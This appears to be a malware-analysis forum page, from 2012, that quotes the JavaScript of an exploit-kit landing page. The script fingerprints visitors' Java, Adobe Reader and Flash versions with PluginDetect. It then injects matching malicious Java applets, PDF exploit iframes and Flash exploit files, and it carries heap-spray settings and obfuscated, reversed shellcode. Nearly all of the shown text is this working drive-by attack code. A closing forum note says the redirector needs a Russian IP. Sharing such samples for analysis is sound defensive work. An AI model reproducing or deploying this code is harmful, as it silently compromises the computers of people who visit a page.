c=this,e=c.$,b;a=a||c.version0;if(c.OTF>0){d=d||c.lang.System.getProperty()[0]}if(c.OTF<3){b=d?1:(a?-0.2:-1);if(c.installed===null||b>c.installed){c.installed=b}}if(c.OTF==2&&c.NOTF&&!c.applet.getResult()[0]&&!c.lang.System.getProperty()[0]){c.installed=a?-0.2:-1};if(c.OTF==3&&c.installed!=-0.5&&c.installed!=0.5){c.installed=(c.NOTF.isJavaActive(1)==1||c.lang.System.getProperty()[0])?0.5:-0.5}if(c.OTF==4&&(c.installed==-0.5||c.installed==0.5)){if(d){c.installed=1}else{if(c.NOTF.isJavaActive(1)==1){if(a){c.installed=1;d=a}else{c.installed=0}}else{if(a){c.installed=-0.2}else{c.installed=-1}}}};if(a){c.version0=e.formatNum(e.getNum(a))}if(d){c.version=e.formatNum(e.getNum(d))}if(f&&e.isString(f)){c.vendor=f}if(!c.vendor){c.vendor=""}if(c.verify&&c.verify.isEnabled()){c.getVersionDone=0}else{if(c.getVersionDone!=1){if(c.OTF<2){c.getVersionDone=0}else{c.getVersionDone=c.applet.can_Insert_Query_Any()?0:1}}}},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],disabled:function(){return this.$$.isDisabled.DTK()},query:function(){var k=this,g=k.$,d=k.$$,j,l,h,m={},f={},a,c=null,i=null,b=(k.hasRun||k.disabled());k.hasRun=1;if(b){return k}k.status=0;if(g.isIE&&g.verIE>=6){for(l=0;l<k.classID.length;l++){k.HTML=g.insertHTML("object",["classid",k.classID[l]],[]);c=g.getDOMobj(k.HTML);try{if(c&&c.jvms){break}}catch(j){}}}else{if(!g.isIE&&(h=g.hasMimeType(k.mimeType))&&h.type){k.HTML=g.insertHTML("object",["type",h.type],[]);c=g.getDOMobj(k.HTML)}}if(c){try{a=c.jvms;if(a){i=a.getLength();if(g.isNum(i)){k.status=i>0?1:-1;for(l=0;l<i;l++){h=g.getNum(a.get(i-1-l).version);if(h){k.VERSIONS.push(h);f["a"+g.formatNum(h)]=1}}}}}catch(j){}}h=0;for(l in f){h++}if(h&&h!==k.VERSIONS.length){k.VERSIONS=[]}if(k.VERSIONS.length){k.version=g.formatNum(k.VERSIONS[0])};return k}},AXO:{$:1,hasRun:0,VERSIONS:[],version:"",disabled:function(){return this.$$.isDisabled.AXO()},JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());a.hasRun=1;if(c){return a}var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={};if(e.verIE>=b.minIEver){i=a.search(j,j,d);if(i.length>0&&d){i=a.search(k,k,d)}}else{if(d){i=a.search(f,f,true)}if(i.length==0){i=a.search(h,g,false)}}if(i.length){a.version=i[0];a.VERSIONS=[].concat(i)};return a},search:function(a,j,p){var h,d,f=this,e=f.$,k=f.$$,n,c,l,q,b,o,r,i=[];if(e.compareNums(a.join(","),j.join(","))>0){j=a}j=e.formatNum(j.join(","));var m,s="1,4,2,0",g="JavaPlugin."+a[0]+""+a[1]+""+a[2]+""+(a[3]>0?("_"+(a[3]<10?"0":"")+a[3]):"");for(h=0;h<f.JavaVersions.length;h++){d=f.JavaVersions[h];n="JavaPlugin."+d[0]+""+d[1];b=d[0]+"."+d[1]+".";for(l=d[2];l>=0;l--){r="JavaWebStart.isInstalled."+b+l+".0";if(e.compareNums(d[0]+","+d[1]+","+l+",0",j)>=0&&!e.getAXO(r)){continue}m=e.compareNums(d[0]+","+d[1]+","+l+",0",s)<0?true:false;for(q=d[3];q>=0;q--){c=l+"_"+(q<10?"0"+q:q);o=n+c;if(e.getAXO(o)&&(m||e.getAXO(r))){i.push(b+c);if(!p){return i}}if(o==g){return i}}if(e.getAXO(n+l)&&(m||e.getAXO(r))){i.push(b+l);if(!p){return i}}if(n+l==g){return i}}}return i}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,disabled:function(){return this.$$.isDisabled.navMime()},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.disabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",disabled:function(){return this.$$.isDisabled.navPlugin()},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.disabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";if(!f||c.debug){g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5){f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")}}if(!f||c.debug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.formatNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},lang:{$:1,System:{$:1,hasRun:0,result:[null,null],disabled:function(){return this.$$.isDisabled.windowDotJava()},getPropertyHas:function(a){var b=this,d=b.$,c=b.getProperty()[0];return(a&&c&&d.compareNums(d.formatNum(a),d.formatNum(c))===0)?1:0},getProperty:function(){var f=this,g=f.$,d=f.$$,i,h={},b=f.hasRun||f.disabled();f.hasRun=1;if(!b){var a="java_qqq990";g[a]=null;try{var c=document.createElement("script");c.type="text/javascript";c.appendChild(document.createTextNode('(function(){var e,a;try{a=[window.java.lang.System.getProperty("java.version")+" ",window.java.lang.System.getProperty("java.vendor")+" "]}catch(e){};'+g.name+"."+a+"=a||0})();"));g.head.insertBefore(c,g.head.firstChild);g.head.removeChild(c)}catch(i){}if(g[a]&&g.isArray(g[a])){f.result=[].concat(g[a])}}return f.result}}},applet:{$:1,results:[[null,null],[null,null],[null,null]],getResult:function(){var c=this.results,a,b=[];for(a=0;a<c.length;a++){b=c[a];if(b[0]){break}}return[].concat(b)},HTML:[0,0,0],active:[0,0,0],DummyObjTagHTML:0,DummySpanTagHTML:0,allowed:[1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=0;a<b.allowed.length;a++){if(d.isNum(c[a])){if(c[a]<0){c[a]=0}if(c[a]>3){c[a]=3}b.allowed[a]=c[a]}}}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(a.debug||(a.verify&&a.verify.isEnabled())){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},allDisabled:function(){return this.$$.isDisabled.allApplets()},isDisabled:function(d){var b=this,c=b.$,a=b.$$;if(d==2&&!c.isIE){return 1}if(d===0||d==2){return a.isDisabled.ObjectTag()}if(d==1){return a.isDisabled.AppletTag()}},can_Insert_Query:function(b){var a=this;if(a.HTML[b]){return 0}return !a.isDisabled(b)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(d){var b=this,e=b.allowed,c=b.$,a=b.$$;if(!b.can_Insert_Query(d)){return 0}if(e[d]==3){return 1}if(e[d]==2.8&&!b.getResult()[0]){return 1}if(e[d]==2.5&&!a.lang.System.getProperty()[0]){return 1}if(e[d]==2.2&&!a.lang.System.getProperty()[0]&&!b.getResult()[0]){return 1}if(!a.nonAppletDetectionOk(a.version0)){if(e[d]==2){return 1}if(e[d]==1&&!b.getResult()[0]){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var h,a=this,g=a.$,d=a.$$,i=null,j=null,b=a.results,c;if((b[f][0]&&b[f][1])||(d.debug&&d.OTF<3)){return}c=g.getDOMobj(a.HTML[f],true);if(c){try{i=g.getNum(c.getVersion()+" ");j=c.getVendor()+" ";c.statusbar(g.winLoaded?" ":" ")}catch(h){}if(i&&g.isStrNum(i)){b[f]=[i,j]}else{};try{if(g.isIE&&i&&c.readyState!=4){g.garbage=true;c.parentNode.removeChild(c)}}catch(h){}}},insert_Query_Any:function(){var d=this,i=d.$,e=d.$$,l=d.results,p=d.HTML,a="&nbsp;&nbsp;&nbsp;&nbsp;",g="A.class",m=i.file.getValid(e);if(!m){return d.getResult()}if(e.OTF<1){e.OTF=1}if(d.allDisabled()){return d.getResult()}if(e.OTF<1.5){e.OTF=1.5}var j=m.name+m.ext,h=m.path;var f=["archive",j,"code",g],c=["mayscript","true"],o=["scriptable","true"].concat(c),n=e.navigator,b=!i.isIE&&n.mimeObj&&n.mimeObj.type?n.mimeObj.type:e.mimeType[0];if(d.should_Insert_Query(0)){if(e.OTF<2){e.OTF=2};p[0]=i.isIE?i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e):i.insertHTML("object",["type",b],["codebase",h].concat(f).concat(o),a,e);l[0]=[0,0];d.query(0)}if(d.should_Insert_Query(1)){if(e.OTF<2){e.OTF=2};p[1]=i.isIE?i.insertHTML("applet",["alt",a].concat(c).concat(f),["codebase",h].concat(c),a,e):i.insertHTML("applet",["codebase",h,"alt",a].concat(c).concat(f),[].concat(c),a,e);l[1]=[0,0];d.query(1)}if(d.should_Insert_Query(2)){if(e.OTF<2){e.OTF=2};p[2]=i.isIE?i.insertHTML("object",["classid",e.classID],["codebase",h].concat(f).concat(o),a,e):i.insertHTML();l[2]=[0,0];d.query(2)}if(!d.DummyObjTagHTML&&!e.isDisabled.ObjectTag()){d.DummyObjTagHTML=i.insertHTML("object",[],[],a)}if(!d.DummySpanTagHTML){d.DummySpanTagHTML=i.insertHTML("",[],[],a)};var k=e.NOTF;if(e.OTF<3&&k.shouldContinueQuery()){e.OTF=3;k.onIntervalQuery=i.handler(k.$$onIntervalQuery,k);if(!i.winLoaded){i.WLfuncs0.push([k.winOnLoadQuery,k])}setTimeout(k.onIntervalQuery,k.intervalLength)};return d.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var e=this,d=e.$,c=e.$$,b=c.applet,a;for(a=0;a<b.results.length;a++){if(b.HTML[a]&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&e.isAppletActive(a)>=0){return 1}}return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(c,a){var d=this,b=d.$$.applet.active;if(!a){b[c]=d.isAppletActive_(c)}return b[c]},isAppletActive_:function(d){var g=this,f=g.$,b=g.$$,l=b.navigator,a=b.applet,h=a.HTML[d],i,k,c=0,j=f.getTagStatus(h,a.DummySpanTagHTML,a.DummyObjTagHTML,g.count);if(j==-2){return -2}try{if(f.isIE&&f.verIE>=b.minIEver&&f.getDOMobj(h).object){return 1}}catch(i){}for(k=0;k<a.active.length;k++){if(a.active[k]>0){c=1}}if(j==1&&(f.isIE||((b.version0&&l.javaEnabled()&&l.mimeObj&&(h.tagName=="object"||c))||b.lang.System.getProperty()[0]))){return 1}if(j<0){return -1}return 0},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a[1],a[2])}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()||(c.winLoaded&&d.count>d.countMax)){d.queryCompleted(a[1],a[2])}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var g=this,f=g.$,e=g.$$,d=e.applet,b,a,c;for(b=0;b<d.results.length;b++){d.query(b)}a=d.getResult();c=a[0]?true:false;return[c,a[0],a[1]]},queryCompleted:function(c,f){var e=this,d=e.$,b=e.$$;if(b.OTF>=4){return}b.OTF=4;var a=e.isJavaActive();b.setPluginStatus(c,f,0);if(b.funcs){d.callArray(b.funcs)}if(d.onDoneEmptyDiv){d.onDoneEmptyDiv()}}},zz:0},flash:{mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",getVersion:function(){var b=function(i){if(!i){return null}var e=/[\d][\d\,\.\s]*[rRdD]{0,1}[\d\,]*/.exec(i);return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null};var j=this,g=j.$,k,h,l=null,c=null,a=null,f,m,d;if(!g.isIE){m=g.hasMimeType(j.mimeType);if(m){f=g.getDOMobj(g.insertHTML("object",["type",j.mimeType],[],"",j));try{l=g.getNum(f.GetVariable("$version"))}catch(k){}}if(!l){d=m?m.enabledPlugin:null;if(d&&d.description){l=b(d.description)}if(l){l=g.getPluginFileVersion(d,l)}}}else{for(h=15;h>2;h--){c=g.getAXO(j.progID+"."+h);if(c){a=h.toString();break}}if(!c){c=g.getAXO(j.progID)}if(a=="6"){try{c.AllowScriptAccess="always"}catch(k){return"6,0,21,0"}}try{l=b(c.GetVariable("$version"))}catch(k){}if(!l&&a){l=a}}j.installed=l?1:-1;j.version=g.formatNum(l);return true}},adobereader:{mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",INSTALLED:{},pluginHasMimeType:function(d,c,f){var b=this,e=b.$,a;for(a in d){if(d[a]&&d[a].type&&d[a].type==c){return 1}}if(e.getMimeEnabledPlugin(c,f)){return 1}return 0},getVersion:function(l,j){var g=this,d=g.$,i,f,m,n,b=null,h=null,k=g.mimeType,a,c;if(d.isString(j)){j=j.replace(/\s/g,"");if(j){k=j}}else{j=null}if(d.isDefined(g.INSTALLED[k])){g.installed=g.INSTALLED[k];return}if(!d.isIE){a="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";if(g.getVersionDone!==0){g.getVersionDone=0;b=d.getMimeEnabledPlugin(g.mimeType,a);if(!j){n=b}if(!b&&d.hasMimeType(g.mimeType)){b=d.findNavPlugin(a,0)}if(b){g.navPluginObj=b;h=d.getNum(b.description)||d.getNum(b.name);h=d.getPluginFileVersion(b,h);if(!h&&d.OS==1){if(g.pluginHasMimeType(b,"application/vnd.adobe.pdfxml",a)){h="9"}else{if(g.pluginHasMimeType(b,"application/vnd.adobe.x-mars",a)){h="8"}}}}}else{h=g.version}if(!d.isDefined(n)){n=d.getMimeEnabledPlugin(k,a)}g.installed=n&&h?1:(n?0:(g.navPluginObj?-0.2:-1))}else{b=d.getAXO(g.progID[0])||d.getAXO(g.progID[1]);c=/=\s*([\d\.]+)/g;try{f=(b||d.getDOMobj(d.insertHTML("object",["classid",g.classID],["src",""],"",g))).GetVersions();for(m=0;m<5;m++){if(c.test(f)&&(!h||RegExp.$1>h)){h=RegExp.$1}}}catch(i){}g.installed=h?1:(b?0:-1)}if(!g.version){g.version=d.formatNum(h)}g.INSTALLED[k]=g.installed}},zz:0}};PluginDetect.initScript();PluginDetect.getVersion(".");
function str_replace(search, replace, subject){
if(!(replace instanceof Array)){
replace=new Array(replace);
if(search instanceof Array){
while(search.length>replace.length){
replace[replace.length]=replace[0];
}
}
}
if(!(search instanceof Array))search=new Array(search);
while(search.length>replace.length){
replace[replace.length]="";
}
if(subject instanceof Array){
for(k in subject){
subject[k]=str_replace(search,replace,subject[k]);
}
return subject;
}
for(var k=0; k<search.length; k++){
var i = subject.indexOf(search[k]);
while(i>-1){
subject = subject.replace(search[k], replace[k]);
i = subject.indexOf(search[k],i);
}
}
return subject;
}
function getCN(){return "../media/score.swf"}
function getBlockSize(){return 1024}
function getAllocSize(){return 1024*1024}
function getAllocCount(){return 300}
function getFillBytes(){var a='%u'+'0c0c';return a+a}
function getShellCode(){var a="8282x&51e1x&7134x&0485x&6085x&70e4x&70a5x&b4b4x&6460x&a5d5x&64c4x&c594x&0414x&c560x&74a5x&b585x&9464x&c5a5x&7070x&8521x&c5c5x&8504x&2370x&15e1x&eee6x&3733x&2e2ax&59b1x&7492x&621ax&6d2ax&4c0bx&6662x&7d6ax&6d7dx&0c4bx&e702x&6d7dx&8224x&ce24x&82d5x&8a71x&2df6x&82d5x&8a71x&b3f6x&a23cx&423cx&babex&e7c2x&b77dx&3c42x&82bax&c224x&7de7x&82b7x&e324x&8ed5x&c3dax&7de7x&2482x&b7f7x&2482x&2482x&9697x&53c2x&0ac6x&c281x&2a9ex&8217x&5312x&eec6x&4444x&60c4x&53d2x&fec6x&a4c5x&f585x&5382x&fec6x&1e97x&0cb1x&423ax&7de7x&8282x&0d82x&b704x&b580x&8050x&c002x&fec6x&b1a1x&e5a5x&c0c2x&fec6x&f4b5x&a5d4x&c2c0x&42fex&47c0x&825ax&9282x&4cc2x&a59ax&a23cx&7d3cx&7d7dx&0c94x&3a0cx&ce02x&e3bax&c77dx&4454x&d5a5x&8204x&6482x&0474x&7dbcx&bed2x&83bax&3a67x&3a4cx&87d7x&8e13x&87bax&8282x&7d82x&8604x&8724x&8207x&8282x&0c82x&ac1dx&7d7dx&0b7dx&170cx&24d2x&3afdx&0402x&bd3ax&eb3cx&c5b2x&42b1x&8a55x&0480x&583ax&3cb7x&17bex&3867x&b2dex&c23ax&5f3ax&0fb2x&423ax&c7c0x&4c7dx&5ae6x&4236x&e43ax&b25fx&67c0x&673ax&d5ecx&3173x&3c9dx&2f86x&52b2x&9e3ex&c502x&01adx&6983x&3f72x&deb1x&58b2x&964dx&1e16x&ddb1x&80b2x&3ae5x&dde7x&05b2x&c5d1x&413ax&3ad5x&97e7x&3c46x&971cx&ccd5x&c0dax&fac1x&d53dx&11e2x&bee6x&8681x&093ax&7d7dx&d383x&9a6cx&b140x&b2c5x&6741x&e43ax&b13fx&e502x&e73ax&8543x&423ax&3a86x&8681x&c43ax&b18ex&1c77x&d5c1x&daccx&ffffx&beffx&508ex&afbex&042ex&0382x&ef08x&9e45x&6618x&139cx&0185x&cfbex&4ecfx&6638x&1414x&1414x&".split("").reverse().join("");return str_replace("&x", "%u", a)}
var $$ = PluginDetect;
function displayResults($){
var javax = ($.getVersion("Java")+".").toString().split(".");
if ($.isMinVersion("Java")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<7)||(javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<9))){
if (javax[1]==7){
variant = "new";
val1="0b0909041f";
val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139270235391c022c391c";
} else {
variant = "file";
val1="0b0909041f";
val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139370235391c022c391c";
}
var d=document.createElement("div");
d.innerHTML = '<object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" WIDTH="200" HEIGHT="200"><PARAM NAME="CODE" VALUE="bagdfssdb"><PARAM NAME="CODEBASE" VALUE="../media/"><PARAM NAME="ARCHIVE" VALUE="' + variant + '.jar"><param name="type" value="application/x-java-applet;version=1.6"><param name="val" value="'+val1+'"/><param name="prime" value="'+val2+'"/></object>';
document.body.appendChild(d);
setTimeout("ShowPDF()", 5509);
} else {
ShowPDF();
}
};
$$.onDetectionDone("Java", displayResults, "./getJavaInfo.jar");
function ShowPDF(){
var pdf = (PluginDetect.getVersion("AdobeReader")+".").toString().split(".");
var vver = "";
if (pdf[0] < 8){
vver = "old";
setTimeout("FlashExploit()", 8003);
} else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)){
vver = "new";
setTimeout("FlashExploit()", 7004);
} else {
//слудующий эксплойт
FlashExploit();
}
if (vver != ""){
var d=document.createElement("div");
d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';
document.body.appendChild(d);
}
}
function FlashExploit(){
var ver = ($$.getVersion("Flash")+".").toString().split(".");
if (((ver[0]==10&&ver[1]==0&&ver[2]>40)||((ver[0]==10&&ver[1]>0)&&(ver[0]==10&&ver[1]<2)))||((ver[0]==10&&ver[1]==2&&ver[2]<159)||(ver[0]==(11-1)&&ver[1]<2))){
var oSpan=document.createElement("span");
document.body.appendChild(oSpan);
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='../media/field.swf' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='../media/field.swf' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
}else if((ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23)||(ver[0]==10&&ver[1]==3&&ver[2]<181)){
var oSpan=document.createElement("span");
document.body.appendChild(oSpan);
var avmurl = "02e6b1525353caa8ad555330b65154b25550abb1b25633b6315350b7a93134ac55a835a951b252ca3556b1cf4f7e7a1c2075a8";
oSpan.innerHTML="<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='../media/flash.swf?info="+avmurl+"' /><embed src='../media/flash.swf?info="+avmurl+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"}
}
</script>
</body>
</html>
100
Malicious Domains / Re: Trojan Ransom
« Last post by EP_X0FF on November 09, 2012, 02:04:05 pm »
Russian IP required for redirector, otherwise nohow.
Pages: 1 ... 8 9 [10]